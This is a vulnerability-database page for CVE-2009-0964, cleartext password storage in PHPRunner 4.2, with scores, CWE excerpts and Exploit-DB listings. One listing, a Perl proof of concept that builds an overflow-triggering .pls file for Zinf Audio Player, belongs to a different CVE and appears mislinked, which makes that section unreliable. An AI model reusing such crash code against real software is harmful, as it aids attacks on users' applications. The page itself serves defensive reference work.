CVE-2009-0964
published 2009-03-19CVE-2009-0964: UserView_list.php in PHPRunner 4.2, and possibly earlier, stores passwords in cleartext in the database, which allows attackers to gain privileges. NOTE: this…
PriorityP348high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
1.92%
77.4th percentile
UserView_list.php in PHPRunner 4.2, and possibly earlier, stores passwords in cleartext in the database, which allows attackers to gain privileges. NOTE: this can be leveraged with a separate SQL injection vulnerability to obtain passwords remotely without authentication.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xlinesoft | phprunner | <= 4.2 | — |
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHPRunner 4.2 - 'SearchOption' Blind SQL Injection
exploitdb·2009-03-17
CVE-2009-0964 PHPRunner 4.2 - 'SearchOption' Blind SQL Injection
PHPRunner 4.2 - 'SearchOption' Blind SQL Injection
---
##########################www.BugReport.ir########################################
#
# AmnPardaz Security Research Team
#
# Title: PHPRunner SQL Injection
# Vendor: http://www.xlinesoft.com
# Vulnerable Version: 4.2 (prior versions also may be affected)
# Exploitation: Remote with browser
# Original Advisory: http://www.bugreport.ir/index_63.htm
# Fix: N/A
###################################################################################
####################
- Description:
####################
PHPRunner builds visually appealing web interface for popular databases. Your web site visitors will be able to easily search, add, edit, delete and exprt
data in MySQL, Oracle, SQL Server, MS Access, and Postgre databases.
###############
Exploit-DB
Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
exploitdb·2009-01-27
CVE-2004-0964 Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
---
#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (PLS FILE) Buffer Overflow PoC
my $chars="\x90" x 2000;
open(MYFILE,'>>hakxer.pls');
print MYFILE $chars;
close(MYFILE);
print " PoC Created .. Hakxer [ Sec-Geeks.com ] EgY Coders Team";
# milw0rm.com [2009-01-27]
No writeups or analysis indexed.
CWE
Missing Encryption of Sensitive Data
mitre_cwe
CWE-311 Missing Encryption of Sensitive Data
CWE-311: Missing Encryption of Sensitive Data
The product does not encrypt sensitive or critical information before storage or transmission.
Modes of Introduction:
Phase: Architecture and Design
Note: OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase.
Phase: Operation
Common Consequences:
Scope: Confidentiality. Impact: Read Application Data. If the application does not use a secure channel, such as SSL, to exchange sensitive information, it is possible for an attacker with access to the network traffic to sniff packets from the connection and uncover the data. This attack is not technically difficult, but does require physical access to some portion of the network over which the sensitive data travels. This access is usually somewhe
CWE
Cleartext Storage of Sensitive Information
mitre_cwe
CWE-312 Cleartext Storage of Sensitive Information
CWE-312: Cleartext Storage of Sensitive Information
The product stores sensitive information in cleartext within a resource that might be accessible to another control sphere.
Modes of Introduction:
Phase: Architecture and Design
Note: OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase.
Common Consequences:
Scope: Confidentiality. Impact: Read Application Data. An attacker with access to the system could read sensitive information stored in cleartext (i.e., unencrypted). Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.
Detection Methods:
Automated Static Analysis: Automated static analysis, commonly referred to as Stat
http://osvdb.org/52804http://www.bugreport.ir/index_63.htmhttp://www.securityfocus.com/archive/1/501894/100/0/threadedhttp://www.vupen.com/english/advisories/2009/0750https://exchange.xforce.ibmcloud.com/vulnerabilities/49279https://www.exploit-db.com/exploits/8226http://osvdb.org/52804http://www.bugreport.ir/index_63.htmhttp://www.securityfocus.com/archive/1/501894/100/0/threadedhttp://www.vupen.com/english/advisories/2009/0750https://exchange.xforce.ibmcloud.com/vulnerabilities/49279https://www.exploit-db.com/exploits/8226
2009-03-19
Published